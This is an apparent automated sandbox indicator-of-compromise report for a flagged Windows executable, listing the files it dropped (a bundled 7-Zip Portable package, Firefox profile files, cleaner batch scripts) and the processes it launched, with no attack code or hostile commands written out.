IOC Report
SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe
PE32 executable (console) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\TMP\cr-20241021-53901\ariac.exe
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_6bf93a9b-760a-4f47-9421-783bc158774c.json (copy)
JSON data
dropped
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_6bf93a9b-760a-4f47-9421-783bc158774c.json.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Temp\24C7.tmp\my_cleaner2.bat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41
ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
dropped
C:\Users\user\AppData\Local\Temp\tmpaddon
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.json (copy)
ASCII text, with very long lines (5740), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.json.tmp
ASCII text, with very long lines (5740), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4 (copy)
Mozilla lz4 compressed data, originally 22422 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4.tmp
Mozilla lz4 compressed data, originally 22422 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.json (copy)
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.json.tmp
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite
SQLite 3.x database, user version 5, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 8, cookie 0x6, schema 4, largest root page 8, UTF-8, vacuum mode 1, version-valid-for 4
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\store.json.mozlz4 (copy)
Mozilla lz4 compressed data, originally 56 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\store.json.mozlz4.tmp
Mozilla lz4 compressed data, originally 56 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extensions.json (copy)
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extensions.json.tmp
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info (copy)
ASCII text
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info.tmp
ASCII text
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
SQLite Write-Ahead Log, version 3007000
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs-1.js
ASCII text, with very long lines (1743), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js (copy)
ASCII text, with very long lines (1743), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite
SQLite 3.x database, user version 1, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json (copy)
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json.tmp
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\recovery.baklz4 (copy)
Mozilla lz4 compressed data, originally 5760 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\recovery.jsonlz4 (copy)
Mozilla lz4 compressed data, originally 5760 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\recovery.jsonlz4.tmp
Mozilla lz4 compressed data, originally 5760 bytes
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite
SQLite 3.x database, user version 131075, last written using SQLite version 3042000, page size 512, file counter 6, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 6
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\targeting.snapshot.json (copy)
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\targeting.snapshot.json.tmp
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\xulstore.json (copy)
JSON data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\xulstore.json.tmp
JSON data
dropped
C:\Users\user\Desktop\ariac.exe
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\TMP\cr-20241021-53901\clean.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean.exe.aria2 (copy)
data
dropped
C:\Users\user\TMP\cr-20241021-53901\clean.exe.aria2__temp
data
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\7-ZipPortable.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip.chm
MS Windows HtmlHelp Data
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip32.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.sfx
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zCon.sfx
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zFM.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zG.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\History.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\License.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\descript.ion
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\readme.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7-zip.chm
MS Windows HtmlHelp Data
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7-zip.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.sfx
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zCon.sfx
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zFM.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zG.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\History.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\af.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\an.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ar.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ast.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\az.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ba.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\be.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\bg.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\bn.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\br.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ca.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\co.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\cs.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\cy.txt
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\da.txt
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\de.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\el.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\en.ttt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\eo.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\es.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\et.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\eu.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ext.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fa.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fi.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fr.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fur.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\fy.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ga.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\gl.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\gu.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\he.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hi.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hr.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hu.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\hy.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\id.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\io.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\is.txt
Unicode text, UTF-8 text
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\it.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ja.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ka.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\kaa.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\kab.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\kk.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ko.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ku-ckb.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ku.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ky.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\lij.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\lt.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\lv.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mk.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mn.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mng.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mng2.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mr.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ms.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\nb.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ne.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\nl.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\nn.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pa-in.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pl.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ps.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pt-br.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pt.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ro.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ru.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sa.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\si.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sk.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sl.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sq.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sr-spc.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sr-spl.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sv.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ta.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\th.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\tr.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\tt.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ug.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\uk.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\uz.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\va.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\vi.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\yo.txt
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\zh-cn.txt
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\zh-tw.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\License.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\descript.ion
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\readme.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\Launcher\7-ZipPortable.ini
Generic INItialization configuration [Activate]
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\Launcher\Custom.nsh
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\Launcher\splash.jpg
JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 416x249, components 3
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon.ico
MS Windows icon resource - 7 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_128.png
PNG image data, 128 x 128, 8-bit colormap, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_16.png
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_32.png
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_75.png
PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appinfo.ini
Generic INItialization configuration [Details]
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\pac_installer_log.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\DefaultData\settings\7zip_portable.reg
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\DefaultData\settings\settings_readme.txt
ASCII text, with no line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\readme.txt
ASCII text, with no line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Donation_Button.png
PNG image data, 110 x 23, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Favicon.ico
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Help_Background_Footer.png
PNG image data, 10 x 16, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Help_Background_Header.png
PNG image data, 10 x 42, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Help_Logo_Top.png
PNG image data, 229 x 47, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\AppNamePortable.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\LauncherLicense.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\PortableApps.comInstallerCustom.nsh
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\Readme.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\Zip\help.html
HTML document, ASCII text
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\deleteWord.bat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\deleteWord.err
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\clean\deleteWord.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\log.txt
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\log2.txt
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\null
ASCII text, with escape sequences
modified
C:\Users\user\TMP\cr-20241021-53901\result.html
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\TMP\cr-20241021-53901\serialnumber.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\TMP\cr-20241021-53901\serialnumber2.txt
ASCII text, with CRLF line terminators
modified
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 181 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe
"C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24C7.tmp\my_cleaner2.bat" "C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe""
malicious
